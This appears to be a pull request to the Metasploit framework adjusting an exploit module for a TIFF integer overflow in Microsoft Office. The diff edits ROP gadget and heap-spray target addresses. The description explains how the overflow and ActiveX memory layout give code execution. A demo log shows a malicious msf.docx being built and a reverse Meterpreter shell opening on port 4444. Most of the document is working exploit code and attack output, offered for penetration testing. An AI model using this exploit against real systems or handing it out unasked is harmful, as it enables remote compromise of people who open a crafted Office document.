### PR TITLE
Microsoft Tagged Image File Format (TIFF) Integer Overflow

### DIFF
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Gain control of the call [eax+50h] instruction
     # XCHG EAX, ESP; RETN msvcrt
-    buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
+    buf[0x4874, 4] = [0x12dd0700-0x50].pack('V')
 
     buf
   end
@@ -148,9 +148,6 @@ class Metasploit3 < Msf::Exploit::Remote
   # Generates a payload
   #
   def get_rop_payload
-    # Target address (200F0700):
-    # 0:000> dd  200f06fc L4
-    # 200f06fc  ffffffff 36643ab8 d9c0d946 5af42474
     p = ''
     p << [0x77c15ed5].pack('V') # XCHG EAX, ESP  msvcrt
     p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
@@ -235,7 +232,7 @@ class Metasploit3 < Msf::Exploit::Remote
     mscd << [0xfffffffe].pack('V')
     mscd << [0xffffffff].pack('V') * 32 #52
     mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
-    mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
+    mscd << [0x12dd0704].pack('V') # Final payload target address to begin the ROP
     mscd << [0xffffffff].pack('V') * 18
     mscd << @rop_payload
 

--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -234,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
     mscd << [0xfffffffe].pack('V')
     mscd << [0xffffffff].pack('V') * 32 #52
     mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
-    mscd << [0x12dd0704].pack('V') # Final payload target address to begin the ROP
+    mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
     mscd << [0xffffffff].pack('V') * 18
     mscd << @rop_payload
 


### PR DESCRIPTION
The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a drawing in Microsoft Office, and how it gets calculated with user-controlled inputs, and stored in the EAX register. The 32-bit register will run out of storage space to represent the large vlaue, which ends up being 0, but it still gets pushed as a dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a chunk anyway with size 0, and the address of this chunk is used as the destination buffer of a memcpy function, where the source buffer is the EXIF data (an extended image format supported by TIFF), and is also user-controlled. A function pointer in the chunk returned by HeapAlloc will end up being overwritten by the memcpy function, and then later used in OGL!GdipCreatePath. By successfully controlling this function pointer, and the memory layout using ActiveX, it is possible to gain arbitrary code execution under the context of the user.

Demo:

```
msf exploit(mswin_tiff_overflow) > rerun
[*] Reloading module...

[*] Initializing files...
[*] Packing directory: _rels
[*] Packing directory: docProps
[*] Packing file: docProps/app.xml
[*] Packing file: docProps/core.xml
[*] Packing directory: word
[*] Packing directory: word/charts
[*] Packing directory: word/charts/_rels
[*] Packing file: word/charts/_rels/chart1.xml.rels
[*] Packing file: word/charts/_rels/chart2.xml.rels
[*] Packing file: word/charts/_rels/chart3.xml.rels
[*] Packing file: word/charts/_rels/chart4.xml.rels
[*] Packing file: word/charts/_rels/chart5.xml.rels
[*] Packing file: word/charts/_rels/chart6.xml.rels
[*] Packing file: word/charts/chart1.xml
[*] Packing file: word/charts/chart2.xml
[*] Packing file: word/charts/chart3.xml
[*] Packing file: word/charts/chart4.xml
[*] Packing file: word/charts/chart5.xml
[*] Packing file: word/charts/chart6.xml
[*] Packing directory: word/embeddings
[*] Packing file: word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx
[*] Packing file: word/embeddings/Microsoft_Office_Excel_Worksheet2.xlsx
[*] Packing file: word/embeddings/Microsoft_Office_Excel_Worksheet3.xlsx
[*] Packing file: word/embeddings/Microsoft_Office_Excel_Worksheet4.xlsx
[*] Packing file: word/embeddings/Microsoft_Office_Excel_Worksheet5.xlsx
[*] Packing file: word/embeddings/Microsoft_Office_Excel_Worksheet6.xlsx
[*] Packing file: word/fontTable.xml
[*] Packing directory: word/media
[*] Packing file: word/settings.xml
[*] Packing file: word/styles.xml
[*] Packing directory: word/theme
[*] Packing file: word/theme/theme1.xml
[*] Packing file: word/webSettings.xml
[*] Packing ActiveX controls...
[*] Packing file: [Content_Types].xml
[*] Packing file: /word/media/image1.jpeg
[*] Packing file: /word/document.xml
[*] Packing file: _rels/.rels
[*] Packing file: /word/_rels/document.xml.rels
[+] msf.docx stored at /Users/wchen/.msf4/local/msf.docx
msf exploit(mswin_tiff_overflow) > use exploit/multi/handler 
msf exploit(handler) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.0.1.76
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.76:54985) at 2013-11-22 19:17:07 -0600

meterpreter > 
```
